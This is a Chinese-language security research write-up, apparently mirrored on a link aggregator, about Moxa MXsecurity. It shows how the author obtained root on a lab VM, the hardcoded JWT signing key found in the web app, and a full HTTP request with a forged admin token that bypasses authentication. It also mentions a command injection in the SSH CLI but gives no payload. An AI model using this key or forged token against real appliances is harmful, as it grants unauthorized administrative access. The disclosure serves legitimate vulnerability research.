3
Moxa MXsecurity 硬编码认证绕过/SSH伪shell命令注入
source link: https://y4er.com/posts/mxsecurity-command-injection-and-hardcoded-credential/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
下载和安装
登录ssh
用admin用户登录只有一个cli程序,不是bash,需要挂载vmdk修改/etc/shadow文件,改掉user1用户的密码。
user1:$6$xPyopDlu$p3jdHPn3XG8OToD6acaXPBtVQgIvx.fUor0rJEtL0qgLqfPDcPvKlC0eDa77P5afST3Hrg7DFlPQrdqAHSisY1:19188:0:99999:7:::
密码为qwe123!@#
然后用user1用户登录,sudo过去就是root了
docker 启动的,从docker cp出来即可
[root@mxsecurity user1]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0173ff8b578c nsm-web "python3 -u run.py" 8 minutes ago Up 8 minutes 0.0.0.0:443->443/tcp, :::443->443/tcp nsm-web
eb9dcdd27d4b nsm-receiver "python3 -u run.py" 8 minutes ago Up 8 minutes nsm-receiver
44dc99289cb6 eclipse-mosquitto:1.6-openssl "/docker-entrypoint.…" 8 minutes ago Up 8 minutes 0.0.0.0:1883->1883/tcp, :::1883->1883/tcp, 0.0.0.0:8883->8883/tcp, :::8883->8883/tcp nsm-broker
d2175f582fac cturra/ntp "/bin/sh /opt/startu…" 8 minutes ago Up 8 minutes (healthy) 0.0.0.0:123->123/udp, :::123->123/udp nsm-ntp
[root@mxsecurity user1]# docker cp 0173ff8b578c:/app/ /tmp/
jwt硬编码key
APP.config["JWT_SECRET_KEY"] = "MXsecurity secret key"
APP.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
APP.config["JWT_TOKEN_LOCATION"] = ["headers", "cookies"]
JWT = JWTManager(APP)
GET /api/v1/system/status HTTP/1.1
Host: 172.16.16.204
Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY4NTA2NTY0OCwianRpIjoiNjM0OTZmMzQtMjIzYi00MWE0LTg3MzMtNWEyMDZlMWM1NTQxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6eyJ1c2VySWQiOiIxOTc4MjdkNC1mZjk5LTRlOTktOWVmOC03MTkzYTdhYWIzYTIiLCJ1c2VybmFtZSI6ImEiLCJkZXNjcmlwdGlvbiI6InJvb3QiLCJpc1Jvb3QiOnRydWUsInJvbGUiOnsicm9sZUlkIjoxLCJuYW1lIjoiQWRtaW4iLCJkZXNjcmlwdGlvbiI6IkFkbWluIiwicGVybWlzc2lvbkxpc3QiOlt7InBlcm1pc3Npb25JZCI6MSwiaWQiOiJkYXNoYm9hcmQiLCJ2YWx1ZSI6Mn0seyJwZXJtaXNzaW9uSWQiOjIsImlkIjoic3lzdGVtIiwidmFsdWUiOjJ9LHsicGVybWlzc2lvbklkIjozLCJpZCI6Im1hbmFnZW1lbnQiLCJ2YWx1ZSI6Mn0seyJwZXJtaXNzaW9uSWQiOjQsImlkIjoiZGV2aWNlQ29uZmlndXJhdGlvbiIsInZhbHVlIjoyfSx7InBlcm1pc3Npb25JZCI6NSwiaWQiOiJsb2dnaW5nIiwidmFsdWUiOjJ9LHsicGVybWlzc2lvbklkIjo2LCJpZCI6ImFib3V0IiwidmFsdWUiOjJ9XX0sInJlc2V0TW9kZSI6ImRvbmUiLCJsb2dpbmVkQXQiOiIyMDIzLTA1LTI2VDAxOjQ3OjI4WiIsImxvZ2luZWRUaW1lIjoxNjg1MDY1NjQ4LCJhdXRvTG9nb3V0VGltZSI6OTAwfSwibmJmIjoxNjg1MDY1NjQ4LCJjc3JmIjoiYWI3YjliMjctNjM4Ny00MDYzLWIxZmItZDc0OGRiNDcxZWE2IiwiZXhwIjoyNjk1MTUyMDQ4fQ.sO6cu-ly2D6e7ZctlVuBcF4CkNmZvbMuwQU7U-xyM2g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Skiploading: true
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://172.16.16.204/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
SSH伪shell命令注入
我刚开始还以为是web上的命令注入,然后仔细看了看通告,发现是/bin/cli程序的命令注入
我的评价是十分鸡肋。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK